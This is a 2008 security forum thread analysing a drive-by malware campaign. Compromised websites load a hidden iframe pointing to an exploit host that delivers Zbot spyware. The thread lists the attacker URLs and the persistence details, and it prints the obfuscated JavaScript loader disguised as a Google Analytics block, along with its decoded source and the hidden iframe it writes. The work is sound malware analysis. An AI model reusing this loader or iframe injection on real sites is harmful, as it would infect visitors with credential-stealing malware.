Author Topic: 200.46.83.203  (Read 4756 times)

0 Members and 1 Guest are viewing this topic.

September 01, 2008, 06:19:52 pm
Read 4756 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
compromised websites contain an iframe to :

hxxp://200.46.83.203/bless/index.php

This is an exploit (nice javascript ;) ). Exploit downloads malware from

hxxp://200.46.83.203/bless/bin/file.exe

or

hxxp://200.46.83.203/bless/load.php?bof

Result from virustotal : http://www.virustotal.com/de/analisis/fc4f705a2b7b2be2bbdfb3fb64ce3034

It is identical to : http://www.malwaredomainlist.com/mdl.php?search=i56web.org

Infected client had connections to :

hxxp://200.46.83.203/zz/s.php
hxxp://200.46.83.203/zz/ip.php
hxxp://voovle.info/new2.php
hxxp://200.46.83.203/zz/config.bin

Downloaded exe file drops ntos.exe into c:\windows\system32 folder and hooks winlogon/userinit registry key.

Complete description is here

http://www.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_ZBOT.SK&VSect=Td

http://www.threatexpert.com/report.aspx?uid=3dfc12c2-b732-4669-8502-c056e400cf92
Ruining the bad guy's day

September 02, 2008, 09:37:56 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
The compromised site (foryou-tv.de) contains an iframe encoded in javascript.

Code: [Select]
<!-- Google Analytics Module [BEGINNING] --><script language="javascript">eval("\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x63\x41\x59\x47\x28\x4b\x38\x36\x54\x6b\x50\x29\x20\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x30\x7a\x39\x34\x34\x28\x70\x65\x35\x79\x29\x7b\x76\x61\x72\x20\x62\x36\x34\x30\x33\x49\x78\x3d\x30\x3b\x76\x61\x72\x20\x68\x68\x32\x37\x75\x3d\x70\x65\x35\x79\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x4a\x6d\x58\x42\x36\x36\x36\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x4a\x6d\x58\x42\x36\x36\x36\x3c\x68\x68\x32\x37\x75\x29\x7b\x62\x36\x34\x30\x33\x49\x78\x2b\x3d\x77\x45\x4f\x45\x36\x28\x70\x65\x35\x79\x2c\x4a\x6d\x58\x42\x36\x36\x36\x29\x2a\x68\x68\x32\x37\x75\x25\x32\x35\x35\x3b\x4a\x6d\x58\x42\x36\x36\x36\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x62\x36\x34\x30\x33\x49\x78\x25\x32\x35\x35\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x77\x45\x4f\x45\x36\x28\x78\x33\x61\x36\x32\x36\x45\x2c\x6e\x6b\x67\x68\x38\x74\x78\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x78\x33\x61\x36\x32\x36\x45\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x6e\x6b\x67\x68\x38\x74\x78\x29\x3b\x7d\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x77\x35\x34\x36\x38\x3d\x65\x76\x61\x6c\x28\x22\x61\x72\x67\x75\x6d\x65\x6e\x74\x73\x2e\x63\x61\x6c\x6c\x65\x65\x22\x29\x3b\x76\x61\x72\x20\x59\x55\x46\x55\x33\x30\x3d\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x76\x61\x72\x20\x54\x33\x35\x31\x36\x77\x3d\x30\x2c\x45\x45\x48\x32\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x77\x35\x34\x36\x38\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x76\x39\x43\x36\x72\x69\x3d\x42\x30\x7a\x39\x34\x34\x28\x45\x45\x48\x32\x29\x3b\x4b\x38\x36\x54\x6b\x50\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x4b\x38\x36\x54\x6b\x50\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x63\x32\x67\x63\x39\x3d\x30\x3b\x20\x63\x32\x67\x63\x39\x3c\x4b\x38\x36\x54\x6b\x50\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x20\x63\x32\x67\x63\x39\x2b\x2b\x29\x7b\x59\x55\x46\x55\x33\x30\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65\x28\x77\x45\x4f\x45\x36\x28\x4b\x38\x36\x54\x6b\x50\x2c\x63\x32\x67\x63\x39\x29\x5e\x76\x39\x43\x36\x72\x69\x5e\x77\x45\x4f\x45\x36\x28\x45\x45\x48\x32\x2c\x54\x33\x35\x31\x36\x77\x29\x5e\x63\x32\x67\x63\x39\x25\x32\x35\x35\x5e\x54\x33\x35\x31\x36\x77\x25\x32\x35\x35\x29\x3b\x54\x33\x35\x31\x36\x77\x2b\x2b\x3b\x69\x66\x28\x54\x33\x35\x31\x36\x77\x3e\x45\x45\x48\x32\x2e\x6c\x65\x6e\x67\x74\x68\x29\x54\x33\x35\x31\x36\x77\x3d\x30\x3b\x7d\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x59\x55\x46\x55\x33\x30\x29\x3b\x72\x65\x74\x75\x72\x6e\x20\x59\x55\x46\x55\x33\x30\x3d\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x29\x3b\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x65\x29\x7b\x61\x6c\x65\x72\x74\x28\x65\x29\x3b\x7d\x20\x7d\x3b\x43\x63\x41\x59\x47\x28\x22\x25\x41\x30\x25\x45\x36\x25\x46\x32\x25\x45\x42\x25\x45\x46\x25\x46\x45\x25\x46\x30\x25\x42\x34\x25\x43\x41\x25\x45\x42\x25\x44\x38\x25\x39\x45\x25\x39\x46\x25\x44\x39\x25\x42\x36\x25\x42\x38\x25\x44\x45\x25\x41\x42\x25\x38\x35\x25\x42\x33\x25\x42\x44\x25\x41\x34\x25\x41\x39\x25\x41\x30\x25\x41\x37\x25\x41\x33\x25\x42\x41\x25\x38\x30\x25\x46\x39\x25\x41\x45\x25\x46\x31\x25\x46\x45\x25\x46\x44\x25\x41\x35\x25\x46\x44\x25\x41\x33\x25\x45\x36\x25\x46\x46\x25\x45\x38\x25\x41\x37\x25\x46\x31\x25\x41\x32\x25\x41\x41\x25\x41\x46\x25\x42\x31\x25\x39\x44\x25\x46\x32\x25\x41\x32\x25\x46\x43\x25\x42\x39\x25\x41\x38\x25\x45\x35\x25\x46\x42\x25\x41\x43\x25\x41\x35\x25\x46\x42\x25\x42\x37\x25\x42\x44\x25\x46\x45\x25\x41\x31\x25\x46\x34\x25\x46\x45\x25\x46\x41\x25\x46\x44\x25\x46\x41\x25\x45\x36\x25\x45\x36\x25\x42\x31\x25\x42\x39\x25\x42\x39\x25\x39\x32\x25\x42\x37\x25\x44\x31\x25\x43\x43\x25\x42\x35\x25\x41\x30\x25\x41\x39\x25\x46\x37\x25\x45\x39\x25\x46\x42\x25\x45\x30\x25\x45\x36\x25\x46\x33\x25\x44\x31\x25\x45\x45\x25\x39\x38\x25\x44\x36\x25\x41\x33\x25\x41\x32\x25\x41\x39\x25\x41\x43\x25\x41\x45\x25\x45\x37\x25\x41\x34\x25\x45\x39\x25\x45\x41\x25\x41\x44\x25\x41\x33\x25\x41\x46\x25\x46\x37\x22\x29\x3b");</script><!-- Google Analytics Module [END] -->

Decoded to
Quote
function CcAYG(K86TkP)
 {
   function B0z944(pe5y)
   {
     var b6403Ix=0;
     var hh27u=pe5y.length;
     var JmXB666=0;
     while(JmXB666<hh27u)
     {
       b6403Ix+=wEOE6(pe5y,JmXB666)*hh27u%255;
       JmXB666++;
     }
     return b6403Ix%255;
   }
   function wEOE6(x3a626E,nkgh8tx)
   {
     return x3a626E.charCodeAt(nkgh8tx);
   }
   try
   {
     var w5468=eval("arguments.callee");
     var YUFU30=new String();
     var T3516w=0,EEH2=(new String(w5468)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
     var v9C6ri=B0z944(EEH2);
     K86TkP=unescape(K86TkP);
     for(var c2gc9=0; c2gc9<K86TkP.length; c2gc9++)
     {
       YUFU30+=String.fromCharCode(wEOE6(K86TkP,c2gc9)^v9C6ri^wEOE6(EEH2,T3516w)^c2gc9%255^T3516w%255);
       T3516w++;
       if(T3516w>EEH2.length)T3516w=0;
     }
     document.write(YUFU30);
     return YUFU30=new String();
   }
   catch(e)
   {
     alert(e);
   }
 };
 CcAYG("%A0%E6%F2%EB%EF%FE%F0%B4%CA%EB%D8%9E%9F%D9%B6%B8%DE%AB%85%B3%BD%A4%A9%A0%A7%A3%BA%80%F9%AE%F1%FE%FD%A5%FD%A3%E6%FF%E8%A7%F1%A2%AA%AF%B1%9D%F2%A2%FC%B9%A8%E5%FB%AC%A5%FB%B7%BD%FE%A1%F4%FE%FA%FD%FA%E6%E6%B1%B9%B9%92%B7%D1%CC%B5%A0%A9%F7%E9%FB%E0%E6%F3%D1%EE%98%D6%A3%A2%A9%AC%AE%E7%A4%E9%EA%AD%A3%AF%F7");
 

Result:
Code: [Select]
<iframe src="http://200.46.83.203/bless/index.php" widht="1" height="1" style=display:none></iframe>
Ruining the bad guy's day

September 03, 2008, 02:28:33 pm
Reply #2

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thank you.